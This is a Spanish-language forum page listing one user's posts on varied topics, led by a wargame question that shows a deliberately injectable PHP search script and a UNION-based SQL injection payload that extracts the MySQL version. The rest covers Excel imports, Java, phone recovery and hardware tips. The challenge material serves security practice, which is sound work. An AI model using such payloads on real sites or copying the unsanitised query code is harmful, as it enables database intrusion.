Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#441
Nivel Web / Duda con reto de iSQL
6 Marzo 2015, 16:49 PM
Andaba resolviendo algunos wargames, y me encontre con este! Se trata de encontrar la versión del MySQL. El script es esté:

NOTA: La parte comentareada es parte del script original la cambie para montarlo en mi localhost
Código (php) [Seleccionar]
   if ( !empty( $_GET['buscar'] ) ){
       $buscar = (string) stripslashes( $_GET['buscar'] );
       
       if ( 40 < strlen($buscar) )
           die('Hacker!');
       
       $palabras = explode( ' ', $buscar );
       if ( 3 < count($palabras) )
           die('No se permiten mas de 3 palabras en la busqueda.');
       
       #$consulta = 'SELECT * FROM diccionario WHERE';
       $consulta = 'SELECT * FROM tbl WHERE';
       foreach( (array) $palabras as $palabra )
           $consulta .= " nombre LIKE '%{$palabra}%' OR";
           #$consulta .= " yrClaves LIKE '%{$palabra}%' OR";
           
       $consulta = substr( $consulta, 0, -3 );
       $consulta .= " LIMIT 1;";
   }else{
       $consulta = 'SELECT * FROM tbl LIMIT ' . mt_rand( 0, 5 ) . ',1;';
   }
   
   # Esto es para mi localhost
   $cnn = mysql_connect("127.0.0.1", "root", "");
   $db = mysql_select_db("PoC");
   $query = mysql_query($consulta);
   if( $query !== false ){
       $data = mysql_fetch_array($query);
   }


El tema es que en mi localhost logro obtener la versión del MySQL, pero en el wargame no! De la siguiente manera,
Código (php) [Seleccionar]
5'%09union%09select%09@@version,2%09%23
Para que la query quede de la siguiente manera,
Código (sql) [Seleccionar]
SELECT * FROM tbl WHERE nombre LIKE '%5' union select @@version,2 #%' LIMIT 1;
En mi caso el resultado es: 5.6.21

El reto original esta online, es -> aHR0cDovL3d3dy55YXNoaXJhLm9yZy9SZVRvcy9BbGwvMTY3L2RpY2Npb25hcmlvLnBocD9idXNjYXI9aXNxbA==
#443
Cita de: dimitrix en  3 Marzo 2015, 00:23 AM¿Y no has pensado habilitar un dominio como "elinformatico.info
@dimitrix que simplista! No haz pensado en cambiar de cafetería y listo! o en su defecto de país!
#444
Simplemente, descargate la tabla completa y lo pones en un archivo de excel. Ahora, con el archivo que te enviaron lo modificas en su respectiva fila (puedes usar la función BUSCARV para asociar la edad con el usuario), y subir directamente todo el archivo con los valores nuevos con LOAD DATA INFILE.

Será más facil interactuar con excel y solo subir el archivo CSV al MySQL, que crear un procedimiento almacenado para realizar esa acción!
#445
Esto imagino que va en la sección de programación  Java!

Por otro lado, no se mucho de Java pero creo que sería lo mismo si ingresarás los datos en el Text1 y en el Text2 de la siguiente manera,
Código (java) [Seleccionar]
EditText num1 = (EditText) findViewById(R.id.num1);
EditText num2 = (EditText) findViewById(R.id.num2);
...
num1.setText(strNum1);
num2.setText(strNum1);
#446
Ese es el modo download del móvil, normalmente se ingresa presionando los botones de Volumen+, inicio y power con el fin de instalar o personalizar el sistema operativo del móvil (por así decirlo).

Presionando la tecla de Volumen + te dejaría entrar normalmente. En caso de que no, intenta acceder al modo recovery que sirve para formatear el móvil y dejarlo de fabrica. Se ingresa presionando, Volumen+ (No recuerdo si es con el + o - intentad con los dos), inicio y power.

Si no te deja entrar llévalo a un técnico, no termines de dañar el móvil.

NOTA: Esto una vez me paso cuando deje caer un Galaxy Grand.
#447
Java / Re: restar de una tabla
27 Febrero 2015, 23:00 PM
Por regla no se debe de eliminar nada de la base de datos para dejarlo como historial. Agregar un campo de estado que sea tinyint que sólo acepta 1 o 0.

No se ve la imagen, upload aquí! i.elhacker.net
#448
jajajjajaja no me gustaría ser amigo de @peib0l
#449
@MCKSys Argentina es un monstruo en la ingeniería inversa y ahora veo que para el "amor" es igual, tendrán relación?

Ahora lo del tema, AMIGO es AMIGO y se RESPETA! Y hablar de las cosas que tu hablas es más ya como de confidente, que es algo más elevado por el tema de la confianza.

Ahora si es tu amigo, como dice @MCKSys Argentina, hablale de lo que esta pasando y dale consejos en lo que tu creas que pueda hacerla feliz.
#450
Pues no se si fue por casualidad, pero me paso lo mismo removí la RAM la limpie (con un borrador de goma) y todo normal.